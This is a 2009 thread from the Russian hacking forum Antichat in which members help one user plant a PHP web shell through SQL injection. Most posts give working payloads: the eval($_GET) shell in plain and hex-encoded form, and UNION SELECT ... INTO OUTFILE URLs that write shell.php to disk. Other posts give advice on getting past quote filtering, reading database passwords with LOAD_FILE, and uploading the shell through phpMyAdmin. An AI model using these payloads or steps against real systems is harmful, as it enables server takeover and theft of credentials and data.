Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
25.01.2009, 18:10
|
|
Участник форума
Регистрация: 29.10.2008
Сообщений: 165
Провел на форуме:
397889
Репутация:
60
|
|
Сообщение от n0ne
kevmen, "<?php eval($_GET['sql'])?>" или '<?php eval($_GET["sql"])?>' или '<?php eval($_GET[sql])?>' и т.д.
бесполезно,не получается
|
|
|
25.01.2009, 18:12
|
|
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134
Репутация:
519
|
|
Закодируй в 16битный формат вида 0xHEX_CODE...
|
|
|
|
25.01.2009, 18:15
|
|
Участник форума
Регистрация: 29.10.2008
Сообщений: 165
Провел на форуме:
397889
Репутация:
60
|
|
http://localhost/view_cat.php?cat=-1+union+select+1,0x3c3f706870206576616c28245f47455 45b73716c5d293f3e,3,4,5,6,7,8,9+INTO+OUTFILE+0x5a3 a5c7368656c6c2e706870
тоже не помогает
|
|
|
|
25.01.2009, 18:17
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865
Репутация:
571
|
|
INTO+OUTFILE+'Z:\shell.php' нельзя хексить..
Пробуй:
Код:
http://localhost/view_cat.php?cat=-1+union+select+1,0x3c3f706870206576616c28245f4745545b73716c5d293f3e,3,4,5,6,7,8,9+INTO+OUTFILE+'Z:\shell.php'
Последний раз редактировалось R1dex; 25.01.2009 в 18:20..
|
|
|
|
25.01.2009, 18:21
|
|
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134
Репутация:
519
|
|
Убери с оутфайла хекс,если не поможет, значит вероятно фильтрация кавычек в запросе...
|
|
|
|
25.01.2009, 18:32
|
|
Участник форума
Регистрация: 29.10.2008
Сообщений: 165
Провел на форуме:
397889
Репутация:
60
|
|
http://localhost/view_cat.php?cat=-1+union+select+1,0x3c3f706870206576616c28245f47455 45b73716c5d293f3e,3,4,5,6,7,8,9+INTO+OUTFILE+'Z:\s hell.php'
пробовал так,бесполезно все!
|
|
|
|
25.01.2009, 18:32
|
|
Участник форума
Регистрация: 29.10.2008
Сообщений: 165
Провел на форуме:
397889
Репутация:
60
|
|
'Z:\shell.php'
вот это нужно как-то приподнести без кавычек)
|
|
|
|
25.01.2009, 18:37
|
|
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134
Репутация:
519
|
|
Где то была инфа по обходу фильтрации кавычек, но будет она пахать в даном случае-хз...
|
|
|
|
25.01.2009, 18:43
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865
Репутация:
571
|
|
Сообщение от kevmen
'Z:\shell.php'
вот это нужно как-то приподнести без кавычек)
Кавычки должны быть и обязательно "настоящими"
|
|
|
|
25.01.2009, 18:46
|
|
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134
Репутация:
519
|
|
Если тебя интересует заливка шелла, то при наличии прав с помощью лоад файла можно узнать пассы от бд и попытатся залить шелл через пхпмайадмин...
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
